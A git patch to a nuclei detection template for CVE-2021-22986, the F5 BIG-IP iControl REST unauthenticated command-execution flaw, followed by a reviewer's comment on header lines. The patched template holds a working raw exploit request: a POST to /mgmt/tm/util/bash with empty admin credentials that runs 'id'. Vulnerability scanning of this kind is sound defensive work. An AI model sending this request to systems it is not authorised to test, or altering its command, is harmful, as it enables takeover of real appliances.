From 5ec6402b7a933a4de92da6b7879fa9bafc248518 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 3 Oct 2021 12:24:46 +0200
Subject: [PATCH] Fix CVE-2021-22986.yaml

---
 cves/2021/CVE-2021-22986.yaml | 23 ++++++++---------------
 1 file changed, 8 insertions(+), 15 deletions(-)

diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml
index 230b015a29..16bd33f494 100644
--- a/cves/2021/CVE-2021-22986.yaml
+++ b/cves/2021/CVE-2021-22986.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-22986
 info:
 name: F5 BIG-IP iControl REST unauthenticated RCE
- author: rootxharsh,iamnoooob
+ author: rootxharsh,iamnoooob,swissky
 severity: critical
 tags: bigip,cve,cve2021,rce
 description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
@@ -15,25 +15,18 @@ info:

 requests:
 - raw:
- - |
- POST /mgmt/shared/authn/login HTTP/1.1
- Host: {{Hostname}}
- Accept-Language: en
- Authorization: Basic YWRtaW46
- Content-Type: application/json
- Cookie: BIGIPAuthCookie=1234
- Connection: close
-
- {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
 - |
 POST /mgmt/tm/util/bash HTTP/1.1
 Host: {{Hostname}}
- Accept-Language: en
- X-F5-Auth-Token: §token§
- Content-Type: application/json
+ Accept-Encoding: gzip, deflate
+ Accept: */*
 Connection: close
+ Content-Type: application/json
+ X-F5-Auth-Token:
+ Authorization: Basic YWRtaW46
+ Content-Length: 42

- {"command":"run","utilCmdArgs":"-c id"}
+ {"command": "run", "utilCmdArgs": "-c id"}

 extractors:
 - type: regex
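Review bot: The hard-coded `Content-Length: 42` added to the raw request in the second hunk is only right for the exact 42-byte JSON body beneath it, so any later edit to that body, even to its whitespace, would send a mismatched length and could make the check fail quietly and report a vulnerable appliance as clean. I would delete that header line and let the HTTP client compute the length, which as far as I know nuclei does for raw requests that are not marked `unsafe`. The empty `X-F5-Auth-Token:` next to `Authorization: Basic YWRtaW46` also reads like a leftover from removing `§token§`, and a trailing-whitespace cleanup could disturb it. A YAML comment above the `- |` line (not inside the block scalar, where it would become part of the request), such as `# empty X-F5-Auth-Token header is intentional, do not remove`, would protect it. The `extractors` block continues past the end of the hunk, so it is worth confirming there that nothing still expects the login response that this commit removes.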